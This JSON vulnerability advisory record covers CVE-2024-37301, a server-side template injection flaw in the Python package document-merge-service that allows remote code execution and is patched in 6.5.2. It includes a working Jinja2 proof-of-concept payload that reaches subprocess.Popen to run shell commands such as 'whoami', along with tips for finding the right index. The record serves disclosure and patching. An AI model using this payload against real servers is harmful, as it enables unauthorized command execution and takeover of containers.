{"id":"GHSA-v5gf-r78h-55q6","summary":"document-merge-service vulnerable to Remote Code Execution via Server-Side Template Injection","details":"### Impact\n_What kind of vulnerability is it? Who is impacted?_\n\nA remote code execution (RCE) via server-side template injection (SSTI) allows for user supplied code to be executed in the server's context where it is executed as the document-merge-server user with the UID 901 thus giving an attacker considerable control over the container.\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\n\nIt has been patched in v6.5.2\n\n### References\n_Are there any links users can visit to find out more?_\n\n- https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection/jinja2-ssti\n\n### POC\n\nAdd the following to a document, upload and render it:\n\n```jinja2\n{% if PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202] %} \nls -a: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202](\"ls -a\", shell=True, stdout=-1).communicate()[0].strip() }}\n\nwhoami: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202](\"whoami\", shell=True, stdout=-1).communicate()[0].strip() }}\n\nuname -a:\n{{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202](\"uname -a\", shell=True, stdout=-1).communicate()[0].strip() }}\n\n{% endif %}\n```\n\nThe index might be different, so to debug this first render a template with `{{ PLACEHOLDER.__class__.__mro__[1].__subclasses__() }}` and then get the index of `subprocess.Popen` and replace 202 with that.\n\n![image](https://github.com/adfinis/document-merge-service/assets/110528300/0a1dfcff-2eba-40f1-af9c-08c8ec2bc0a1)","aliases":["CVE-2024-37301"],"modified":"2026-02-04T19:57:37.443747Z","published":"2024-06-11T20:22:55Z","database_specific":{"github_reviewed_at":"2024-06-11T20:22:55Z","severity":"HIGH","nvd_published_at":"2024-06-11T19:16:07Z","cwe_ids":["CWE-1336"],"github_reviewed":true},"references":[{"type":"WEB","url":"https://github.com/adfinis/document-merge-service/security/advisories/GHSA-v5gf-r78h-55q6"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2024-37301"},{"type":"WEB","url":"https://github.com/adfinis/document-merge-service/commit/a1edd39d33d1bdf75c31ea01c317547be90ca074"},{"type":"PACKAGE","url":"https://github.com/adfinis/document-merge-service"}],"affected":[{"package":{"name":"document-merge-service","ecosystem":"PyPI","purl":"pkg:pypi/document-merge-service"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"6.5.2"}]}],"versions":["5.2.0","5.2.1","6.0.0","6.1.0","6.1.1","6.1.2","6.2.0","6.2.1","6.2.2","6.3.0","6.3.1","6.4.0","6.4.1","6.4.2","6.4.3","6.4.4","6.4.5","6.4.6","6.5.0","6.5.1"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/06/GHSA-v5gf-r78h-55q6/GHSA-v5gf-r78h-55q6.json"}}],"schema_version":"1.7.3","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"}]}